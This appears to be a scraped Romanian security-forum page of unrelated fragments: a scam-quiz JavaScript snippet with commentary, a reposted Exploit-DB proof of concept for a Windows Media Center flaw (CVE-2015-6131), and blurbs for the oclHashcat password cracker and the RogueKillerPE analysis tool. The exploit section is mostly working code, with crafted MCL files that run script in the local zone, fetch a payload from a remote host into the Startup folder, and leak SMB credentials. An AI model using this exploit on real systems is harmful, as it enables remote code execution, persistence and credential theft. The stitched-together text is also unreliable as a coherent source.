http://kalilinuxcourse.blogspot.in/2015/12/how-to-perform-mitm-attack-on-https-traffic.html
-
- 2
-
-
function ctafinal() { setTimeout(function() { $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro"); setTimeout(function() { $(".loadertxt").txtFader("Felicitari! Ai castigat!"); setTimeout(function() { $("#final").fadeOut(250, function() { $("#finalcta").fadeIn(250); }); }, 3000); }, 3000); }, 2500); $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro"); setTimeout(function() { $(".loadertxt").txtFader("Felicitari! Ai castigat!"); Ca sa vezi, stie ca ai castigat fara sa trimita ceva catre "kent.ro" Inca o mizerie care va permite sa vedeti cati prieteni grav batuti in cap aveti. Intelegeti, NIMIC nu e gratis in lumea asta.
-
[/FONT][/COLOR]Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131) Software Vendor: Microsoft Software version : MS Windows Media Center latest version on any Windows OS. Software Vendor Homepage: http://www.microsoft.com CVE: CVE-2015-6131 Exploit Author: Eduardo Braun Prado Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team date: december 8, 2015 Vulnerability description: Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files. exploit code below: ----------- self-exec-1.mcl ------------------------------------ <application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html> ------------------------------------------------------------ ----------self-exec-2.mcl-------------------------------------- <application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close(); </script></html> ---------------------------------------------------------- -----Create-recordsetfile.hta -------------- <html><body onload="aa()"> <script language="VBScript"> function aa() defdir="." alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". Set c = CreateObject("ADODB.Connection") co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;" c.Open co set rs =CreateObject("ADODB.Recordset") rs.Open "SELECT * from recordsetdata.txt", c al=rs.Save(defdir & "\recordsetfile.txt") rs.close end function </script></body></html> ------------------------------------------------------------------------------- ---------recordsetdata.txt------------------------------------------ <html> <script>a=new ActiveXObject('Wscript.Shell')</script> <script>a.Run('calc.exe',1);</script> </html> -------------------------------------------------------------------[COLOR=#000000][FONT=Consolas] Sursa: https://www.exploit-db.com/exploits/38911/
-
Check out our GitHub Repository for the latest development version [h=3]GPU Driver requirements:[/h] NV users require ForceWare 346.59 or later AMD users require Catalyst 14.9 or later [h=2]Features[/h] Worlds fastest password cracker Worlds first and only GPGPU based rule engine Free Open-Source Multi-GPU (up to 128 gpus) Multi-Hash (up to 100 million hashes) Multi-OS (Linux & Windows native binaries) Multi-Platform (OpenCL & CUDA support) Multi-Algo (see below) Low resource utilization, you can still watch movies or play games while cracking Focuses highly iterated modern hashes Focuses dictionary based attacks Supports distributed cracking Supports pause / resume while cracking Supports sessions Supports restore Supports reading words from file Supports reading words from stdin Supports hex-salt Supports hex-charset Built-in benchmarking system Integrated thermal watchdog 150+ Algorithms implemented with performance in mind ... and much more [h=2]oclHashcat Screenshot[/h] [h=2]Attack-Modes[/h] Straight * Combination Brute-force Hybrid dict + mask Hybrid mask + dict * accept Rules Link: oclHashcat - advanced password recovery
-
RogueKillerPE Description RogueKillerPE is a PE parsing tool, able to show internal structure of executable files. It’s able to read either the memory image (process module) or the disk image (filesystem) of a given executable. [TABLE] [TR] [TD] RogueKillerPE 32 bits Download 14 Mb [/TD] [TD] RogueKillerPE 64 bits Download 14 MB [/TD] [/TR] [/TABLE] Features: Open PE from file, and read disk image. Open PE from process, and read memory or disk image. Open file from command line. Drag and drop support. Process general information (pid, parent, …) File general information (attributes, size, …) Process module general information (address, size, …) A bunch of hashes (MD5, SHA1, SHA256, …) Process memory pages, with ability to dump. Injected pages detection, non-readable pages detection. Ability to dump injected pages to file. Hex code, with ability to search (hex values, or string ANSI/UNICODE). Assembly code, with ability to navigate. PE Headers (MZ, PE, Optional, …) RunPE detection, shows which header fields are modified. Checksum validation. PE Sections, with ability to watch hex code and dump to file. PE Imports, with ability to watch APIs assembly code (memory only). PE Exports, with ability to watch APIs assembly code. Hooks detection in imports/exports (table and inline hooks). PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, …) Executable files detection in resources. Ability to watch hex code of resources. Ability to dump resources to file. PDB path detection. Strings scanner, with classification (Registry, files, …) Ability to dump all strings (by category or not) to file. User guide Start the tool. Drag a file on the interface, or load the process list. If you choose a file, there you go. If you choose a process, you can inspect a different module by selecting a new one in the modules list. If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa. Sursa: RogueKillerPE download